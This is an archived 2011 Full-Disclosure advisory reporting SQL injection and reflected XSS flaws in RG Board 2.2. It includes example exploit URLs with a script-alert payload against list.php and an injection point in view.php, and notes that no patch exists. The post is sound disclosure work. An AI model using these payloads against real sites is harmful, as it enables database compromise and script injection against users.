| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <cf94bb76e122e60b15aa7c110557bbba@insecurityresearch.com> Date: Tue, 28 Jun 2011 08:30:07 -0500 From: Juan Sacco <jsacco@...ecurityresearch.com> To: <full-disclosure@...ts.grok.org.uk> Subject: INSECT Pro - Advisory 2011 0628 - SQL Injection - XSS - RGBoard 2.2 Information -------------------- Name : SQL Injection and XSS discovered Software : RG Board 2.2 Vendor Homepage : http://www.rgboard.com/ Vulnerability Type : SQL injection and XSS reflected Severity : High Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com> Description ------------------ RG Board 2.2 is prone to a SQL Injection and XSS reflected vulnerabilitys because the application fails to properly perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to compromise the victim's machine. Details ------------------- SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application (like queries). Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables attackers to inject client-side script into web pages viewed by other users. Exploit example as follow ----------------------------- SQL Injection: http://target.com/main/view.php?bbs_code=[injectme]&bd_num=106&kw=&ss[sc]=1&ss[st]=1 This vulnerability affects /main/view.php using method GET XSS: http://target.com/main/list.php?bbs_code=news&page=1%3cScRiPt%20%3ealert%28/XSS/%29%3c%2fScRiPt%3e The vulnerability is caused by the following code: <form id="category_form" action="?" method="get" enctype="multipart/form-data"> <p id="ba_content_list_top"><input type="hidden" name="bbs_code" value="news" /> <span class="floating_left">Category: <select name="ss[cat]" onchange="this.form.submit();"> <option value="">All</option> <option value="7">News</option> <option value="8">PR</option> <option value="9">Video</option> </select></span> <span class="floating_right">Total : 47 (1<ScRiPt >alert(/XSS/)</ScRiPt>/3)</span></p> </form> Solution ------------------- No patch are available at this time. Credits ------------------- Manual discovered by Insecurity Research Labs Juan Sacco - http://www.insecurityresearch.com -- _________________________________________________ Insecurity Research - Security auditing and testing software Web: http://www.insecurityresearch.com Insect Pro 2.6.1 was released stay tunned _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists